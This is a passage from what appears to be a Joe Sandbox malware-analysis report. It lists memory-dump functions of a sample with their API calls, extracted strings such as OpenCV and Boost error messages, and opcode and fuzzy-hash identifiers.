                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: 2B
                            • API String ID: 3519838083-2445177625
                            • Opcode ID: c44ce58308eb5a48e53129c11db8eabde19dace27f19670bf82873417d927ecc
                            • Instruction ID: 0ac52ed68039120b99c75f24206eff0401453f0e9003d737ffa1a357b209e6cb
                            • Opcode Fuzzy Hash: c44ce58308eb5a48e53129c11db8eabde19dace27f19670bf82873417d927ecc
                            • Instruction Fuzzy Hash: E41137B1A0160ADFCB14DFA9D5402AAFBF1FF88311F20856ED449E3702E7705A00CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0042FC69), ref: 0047E900
                            • GetCurrentProcess.KERNEL32(0000001D,00000000,00000004,?,?,?,?,?,?,?,?,?,?,?,?,0042FC69), ref: 0047E91B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentLibraryLoadProcess
                            • String ID: D
                            • API String ID: 2934848855-2746444292
                            • Opcode ID: 95cb41975cdac49083b128e6f918a75402d003f9cfa742b2c6257d57799dc649
                            • Instruction ID: b655e112bcf193d03bb4447e8dbe0170a1772b2ec2f11f0a8e34b1e5620e1d61
                            • Opcode Fuzzy Hash: 95cb41975cdac49083b128e6f918a75402d003f9cfa742b2c6257d57799dc649
                            • Instruction Fuzzy Hash: 08114872911348AAEB00DBF8ED057EDB7ACEF5D304F10526AEA05E9090E7749684C268
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0040F6FA
                            • GetProcessHeap.KERNEL32(007A29C4,?,004F4CBE,?,4s,?,?,004F508D,?,?,00403520), ref: 0040F717
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologHeapProcess__onexit
                            • String ID: Tz
                            • API String ID: 3671622277-2318832878
                            • Opcode ID: 28c41b3f64534973e2e7a231395d58ff9ba88769f1ca61debc93bd85e2ca9296
                            • Instruction ID: 839f150a8a5d501b72f51f15b3c6a476b49f3470d528c605fd5a46d2b99ea3e3
                            • Opcode Fuzzy Hash: 28c41b3f64534973e2e7a231395d58ff9ba88769f1ca61debc93bd85e2ca9296
                            • Instruction Fuzzy Hash: FC114F71D06B44DEC750DF68A9456497BA3F78A711B50822EE418CB2A2D77C49548B08
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00426749
                              • Part of subcall function 00426654: __EH_prolog.LIBCMT ref: 00426659
                              • Part of subcall function 00420F37: __EH_prolog.LIBCMT ref: 00420F3C
                              • Part of subcall function 00420F37: std::exception::exception.LIBCONCRT ref: 00420F54
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Deallocatestd::_std::exception::exception
                            • String ID: "gB$dB
                            • API String ID: 153459401-1691998663
                            • Opcode ID: 564496ab3b82ded4e091f0da5a62e7b6eeca70a06788a6df15e99ec190e833c8
                            • Instruction ID: 93782f494ba01e940c8de4254948f93017c889fcedf2d5522df6caf55753ce6c
                            • Opcode Fuzzy Hash: 564496ab3b82ded4e091f0da5a62e7b6eeca70a06788a6df15e99ec190e833c8
                            • Instruction Fuzzy Hash: C611CE7290124DEBDB00EF99C901BDDFFB5EF14324F10814EE5106B292DBB95654DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00532D6B
                              • Part of subcall function 00526915: __EH_prolog.LIBCMT ref: 0052691A
                              • Part of subcall function 00526747: __EH_prolog.LIBCMT ref: 0052674C
                              • Part of subcall function 00526972: __CxxThrowException@8.LIBVCRUNTIME ref: 00526A67
                            Strings
                            • cv::OutOfMemoryError, xrefs: 00532D8D
                            • Failed to allocate %lu bytes, xrefs: 00532D9F
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Exception@8Throw
                            • String ID: Failed to allocate %lu bytes$cv::OutOfMemoryError
                            • API String ID: 1007369359-255125719
                            • Opcode ID: 06a199d06ec91613aa1f69611cc07f16b3b59c01b79db57447051bd22eb1c95a
                            • Instruction ID: ab5bdab6b197a06c747e07827ce1222954709d7041fbdea029814ad387865ae6
                            • Opcode Fuzzy Hash: 06a199d06ec91613aa1f69611cc07f16b3b59c01b79db57447051bd22eb1c95a
                            • Instruction Fuzzy Hash: BD01F972D12128AADB15E7E8DC0AFDD7BB8AF55310F14419EE210571C2EBB45B48C761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B4FA5
                              • Part of subcall function 004B7A73: __EH_prolog.LIBCMT ref: 004B7A78
                              • Part of subcall function 00420F37: __EH_prolog.LIBCMT ref: 00420F3C
                              • Part of subcall function 00420F37: std::exception::exception.LIBCONCRT ref: 00420F54
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                            • new.LIBCMT ref: 004B4FF1
                              • Part of subcall function 004B4B4E: __EH_prolog.LIBCMT ref: 004B4B53
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Deallocatestd::_std::exception::exception
                            • String ID: dB
                            • API String ID: 153459401-2104629891
                            • Opcode ID: af9d3cc1a6085e185555711973224dba09a2e0174bf2ffb6ea272e364e18a918
                            • Instruction ID: 495a43c55d09c925d0ae03b5d4608425af67aeac8f68a042b7901775e42f67cc
                            • Opcode Fuzzy Hash: af9d3cc1a6085e185555711973224dba09a2e0174bf2ffb6ea272e364e18a918
                            • Instruction Fuzzy Hash: C911C271904289EADB11EFA9C506BCDFFF5EF54324F20818EE5506B282C7B94740CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00526A72
                            • std::exception::exception.LIBCMT ref: 00526A83
                              • Part of subcall function 0040F323: ___std_exception_copy.LIBVCRUNTIME ref: 0040F341
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog___std_exception_copystd::exception::exception
                            • String ID: %gR
                            • API String ID: 238416039-1847496865
                            • Opcode ID: e7ec8c1aeff8aea54c0622960873d249bf79ad0e652b139f01fc3f524725f57b
                            • Instruction ID: 6cc51797dc93b3519a544e1ec05f9a053a762e6795f56af9aefd895cec0c021b
                            • Opcode Fuzzy Hash: e7ec8c1aeff8aea54c0622960873d249bf79ad0e652b139f01fc3f524725f57b
                            • Instruction Fuzzy Hash: 93117C71801A48EBC711DBA9C444ADEFBF8FF18314F00426FE55293A91DBB4BA44CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B1189
                              • Part of subcall function 004B4B4E: __EH_prolog.LIBCMT ref: 004B4B53
                              • Part of subcall function 004B4BAA: __EH_prolog.LIBCMT ref: 004B4BAF
                              • Part of subcall function 004B4FA0: __EH_prolog.LIBCMT ref: 004B4FA5
                              • Part of subcall function 004B4FA0: new.LIBCMT ref: 004B4FF1
                              • Part of subcall function 004B503A: __EH_prolog.LIBCMT ref: 004B503F
                              • Part of subcall function 004B503A: __CxxThrowException@8.LIBVCRUNTIME ref: 004B50A1
                            Strings
                            • class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_string<cha, xrefs: 004B11E7
                            • No such node, xrefs: 004B11B4
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Exception@8Throw
                            • String ID: No such node$class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_string<cha
                            • API String ID: 1007369359-3630618227
                            • Opcode ID: b09c959196ce013f82d93875d885f617013b01da6fdb2081dbcde9b183545a41
                            • Instruction ID: 9cc27f8e975c2abf3806b492ea64522396a34f7934f704a0f63302e24a22d674
                            • Opcode Fuzzy Hash: b09c959196ce013f82d93875d885f617013b01da6fdb2081dbcde9b183545a41
                            • Instruction Fuzzy Hash: 4511CE31D012199BCF10EFA8C916BEDBBB4EF04314F10411AE6016B282DBB85B05CBE4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00576D9A
                              • Part of subcall function 005795C0: __EH_prolog.LIBCMT ref: 005795C5
                              • Part of subcall function 00575BCD: __EH_prolog.LIBCMT ref: 00575BD2
                            • _strlen.LIBCMT ref: 00576DEA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$_strlen
                            • String ID: 8nW
                            • API String ID: 1490583215-3678990148
                            • Opcode ID: 357ed8cb5a74ebb7a39500f4bd8a14a0f3a12d5baf0720e2e017f28f83e3d700
                            • Instruction ID: 587648060941c9228cce58899d5a74ac498c95b054a415b06a8918cc77285a0e
                            • Opcode Fuzzy Hash: 357ed8cb5a74ebb7a39500f4bd8a14a0f3a12d5baf0720e2e017f28f83e3d700
                            • Instruction Fuzzy Hash: D50124B19006459EDB24DB69A8057AEFFE8EF82320F00876FE46593292D7B81E00D751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 00414F51
                            • GetLastError.KERNEL32 ref: 00414F5B
                              • Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CompletionErrorH_prologLastPostQueuedStatus
                            • String ID: pqcs
                            • API String ID: 1288862127-2559862021
                            • Opcode ID: 62289c2a887ff509f8b4b6feebd40a0b0ec8652ac821b74d8e0d5ea0993a9edb
                            • Instruction ID: 9a0a4618d32c31c4ca22fcb0b4eafbf0e41916f42df2d488f0aae1e67509a8b1
                            • Opcode Fuzzy Hash: 62289c2a887ff509f8b4b6feebd40a0b0ec8652ac821b74d8e0d5ea0993a9edb
                            • Instruction Fuzzy Hash: D8F08171A00128AF9B219B6588009ABBBADEE8075875080AAEC049B211DA74CD4787E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00412608
                              • Part of subcall function 0041267E: __EH_prolog.LIBCMT ref: 00412683
                              • Part of subcall function 00410E24: __EH_prolog.LIBCMT ref: 00410E29
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: 6A$06A
                            • API String ID: 3519838083-223357171
                            • Opcode ID: f4c3e68e4bc28e1f1f5753c539ab613bd7e891ffd08312e5e4756ce1d1509342
                            • Instruction ID: f4364291f978b96d95e8ab4b4c58549ffb775d8411f43ab9772b0b80358d3521
                            • Opcode Fuzzy Hash: f4c3e68e4bc28e1f1f5753c539ab613bd7e891ffd08312e5e4756ce1d1509342
                            • Instruction Fuzzy Hash: 2A01D4B6501608EAC714DF5CDA006EABFFAFB86B50F10865EE4558B641DBB46A08CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3
                            • String ID: TxX
                            • API String ID: 431132790-379745606
                            • Opcode ID: 689e7e254db3aca9115e9afcdb08b51b46fb092e3c1139756f01da526606b326
                            • Instruction ID: e932cd90f65f572652c57038d0fb4547ca75f9f84a4485dbbce2738842243cbf
                            • Opcode Fuzzy Hash: 689e7e254db3aca9115e9afcdb08b51b46fb092e3c1139756f01da526606b326
                            • Instruction Fuzzy Hash: 0601D6B1900712CBDB20FF94D45676E7BA1FF40761FA5062EE8517B181CFB469008790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3
                            • String ID: vxX
                            • API String ID: 431132790-762046408
                            • Opcode ID: 3639303eccabd03e77228c65733224ab5f6944a02a68d5981ec817b850938b68
                            • Instruction ID: 304df3ac81e099f7acae7f8c403a4c5f923bf45c6520c41da2ae06778c3ceb5d
                            • Opcode Fuzzy Hash: 3639303eccabd03e77228c65733224ab5f6944a02a68d5981ec817b850938b68
                            • Instruction Fuzzy Hash: A201A2B1900312CBDB24FF94D4567AE7BA1FF50716FA1051EA8827B181CFB459418784
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0A
                            • API String ID: 3519838083-187954893
                            • Opcode ID: 081576209a9c57e4d9c2b992600b254f77e2010209fbc48a5611ec0d19550154
                            • Instruction ID: 1205f1b611dd8bb5a84b9eeda5d22fa35e1725b24406dc39a0c12df70a1429ab
                            • Opcode Fuzzy Hash: 081576209a9c57e4d9c2b992600b254f77e2010209fbc48a5611ec0d19550154
                            • Instruction Fuzzy Hash: B1017CB290234AEEC764DFA9854169AFFF5FF15310F10867EE09993641D3B05A00CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: 63A
                            • API String ID: 3519838083-706171910
                            • Opcode ID: cf93a89df8cc1614a4b55885b72047a4b4a4e31fe59863db90c130c1885feb11
                            • Instruction ID: 4d3f0011076075110644a449004c8b57a75cd4cfa51f76ef3dbae39df9de59a1
                            • Opcode Fuzzy Hash: cf93a89df8cc1614a4b55885b72047a4b4a4e31fe59863db90c130c1885feb11
                            • Instruction Fuzzy Hash: 3E019AB1901348EEC720DF99C50579AFFE6FB81321F20826EE484A7281C3B41A00DBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004F4C96
                              • Part of subcall function 0040F6F5: __EH_prolog.LIBCMT ref: 0040F6FA
                              • Part of subcall function 0040F6F5: GetProcessHeap.KERNEL32(007A29C4,?,004F4CBE,?,4s,?,?,004F508D,?,?,00403520), ref: 0040F717
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$HeapProcess
                            • String ID: MO$4s
                            • API String ID: 2845616704-1959134711
                            • Opcode ID: e77d5ff1307ee3a604e189cca595570f67578b3cbff8e24ed796561535490fbd
                            • Instruction ID: dbdc0edb21ee75685d1cf78b0f74f817e5f646d255c02b152c54bcf46313bc55
                            • Opcode Fuzzy Hash: e77d5ff1307ee3a604e189cca595570f67578b3cbff8e24ed796561535490fbd
                            • Instruction Fuzzy Hash: 2601B1B29222158AC354CF5DA80195BB7A4FFD6B10F00C22EE014B3272D77829028B9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: a0A$5A
                            • API String ID: 3519838083-3613670376
                            • Opcode ID: e8c153ac05fb0abf176b655d90569e05d8d2991294badc8d9fe4da1b69cf7429
                            • Instruction ID: 74fbbeb34ab73e4fc6f72e5c78d6e4a9b63b2581873420e1e30d010f3b3e697a
                            • Opcode Fuzzy Hash: e8c153ac05fb0abf176b655d90569e05d8d2991294badc8d9fe4da1b69cf7429
                            • Instruction Fuzzy Hash: 2F014CB1900708DFD724CF98C5487AABBF1FB08359F10865DE49A9B641C3B4DA44CF94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3
                            • String ID: KwX
                            • API String ID: 431132790-2252377540
                            • Opcode ID: ede9df5162d71e286ecfbcee49a640fa95dacd51ba9ddae7882270e4a1c7c7af
                            • Instruction ID: 2493293fc68edf8307d0f6882377ad95a2fd7bbabcc855ca5ef941653a5c689f
                            • Opcode Fuzzy Hash: ede9df5162d71e286ecfbcee49a640fa95dacd51ba9ddae7882270e4a1c7c7af
                            • Instruction Fuzzy Hash: DFF08C32901222CADB20FFD5D5523ADBBA1FF10724FA0461EA8817B292DFF45A448780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3
                            • String ID: KwX
                            • API String ID: 431132790-2252377540
                            • Opcode ID: 0791c912d909bb114e1fc37814755f164039cbc673efee8b620f17e34ce54b71
                            • Instruction ID: 667f10d9b446ec22971da5ba9572065dd1043dcca169df38ce8f0b4ec7abdaa0
                            • Opcode Fuzzy Hash: 0791c912d909bb114e1fc37814755f164039cbc673efee8b620f17e34ce54b71
                            • Instruction Fuzzy Hash: 75F0AF32A013238BDB20FFD4D4523ADBBA6FF10714FA5451EA8957B292DFB45E008780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3
                            • String ID: KwX
                            • API String ID: 431132790-2252377540
                            • Opcode ID: 27cafbe3003fd9ef3693e5490932cf150365ba621ba338f915197c2013b59262
                            • Instruction ID: b27de10d5e233e54874d2d67d3efa33dc70fb71aa3dea89690f2bc477da2d9ae
                            • Opcode Fuzzy Hash: 27cafbe3003fd9ef3693e5490932cf150365ba621ba338f915197c2013b59262
                            • Instruction Fuzzy Hash: 56F0AF71900322DBDB21FF94D5523BDBBA2FF14710FA1021EA89177281EFB46E418780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3
                            • String ID: KwX
                            • API String ID: 431132790-2252377540
                            • Opcode ID: d9f7f8fc42195fcb97ead386d520b8639126ec59907194741c59b0d2c95ab83e
                            • Instruction ID: 8f8e434a96acb005543f2bde57bd38342d4406e2b9b2254bc0bb5f341ac7eaf0
                            • Opcode Fuzzy Hash: d9f7f8fc42195fcb97ead386d520b8639126ec59907194741c59b0d2c95ab83e
                            • Instruction Fuzzy Hash: 58F0A4719403229BDB20FF94D4523ADBBA1FF14710FA5451EA96577181CFB45E008BC0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3
                            • String ID: KwX
                            • API String ID: 431132790-2252377540
                            • Opcode ID: 883ea40c1275f337d1831aa4d9c1cc4527090da2f621a27c6291ef1684baea80
                            • Instruction ID: c816c453889baebd798c0d188bad85b73d6c1bd697daecc73854785cdaa06c26
                            • Opcode Fuzzy Hash: 883ea40c1275f337d1831aa4d9c1cc4527090da2f621a27c6291ef1684baea80
                            • Instruction Fuzzy Hash: 7EF0AF719003228BDB20FF98D4427ADBBA2FF10710FE1462EA991B7182DFB45A01CB84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3
                            • String ID: KwX
                            • API String ID: 431132790-2252377540
                            • Opcode ID: e9791b097cc67749a9b465ac70b91a6e0426e73bf03f71ec33f41e39acb71b29
                            • Instruction ID: 0399cbfa33d010b7fa9ab10653fb90f1a1e68c0f3e970e513ef3794a6c2c296b
                            • Opcode Fuzzy Hash: e9791b097cc67749a9b465ac70b91a6e0426e73bf03f71ec33f41e39acb71b29
                            • Instruction Fuzzy Hash: 81F081719002228AD760BF95D4413BEBBA2FF10750FE0491EA95177286DFB45E018B84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3
                            • String ID: KwX
                            • API String ID: 431132790-2252377540
                            • Opcode ID: 64160bb4d50af1475aa6a7de3b00bafc445e8310aafd977cf05b74791a2d0748
                            • Instruction ID: 18ce4793a3133c9ad5439b04be71690b705f7afeb36922af80ec8387b6386aa7
                            • Opcode Fuzzy Hash: 64160bb4d50af1475aa6a7de3b00bafc445e8310aafd977cf05b74791a2d0748
                            • Instruction Fuzzy Hash: CFF08C719406228ADB60FFD4D4463ADBBA1FF10B10FE10A2EA88077181DFB49E408B84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3
                            • String ID: KwX
                            • API String ID: 431132790-2252377540
                            • Opcode ID: 94acb57d2e8265ba5300e8613ee23ce3d3dafb0f6759aa8159e3a367d3a19198
                            • Instruction ID: 496049f06e3927affc9548a1e932807af7bdfce1de313a27f7a8782c85837d8b
                            • Opcode Fuzzy Hash: 94acb57d2e8265ba5300e8613ee23ce3d3dafb0f6759aa8159e3a367d3a19198
                            • Instruction Fuzzy Hash: 1AF0AF729413228BDB60FF94D4423BDBBA2FF14B64FA1022EE98477281CFB45A40C785
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00582EFD
                            • Concurrency::critical_section::critical_section.LIBCONCRT ref: 00582F32
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
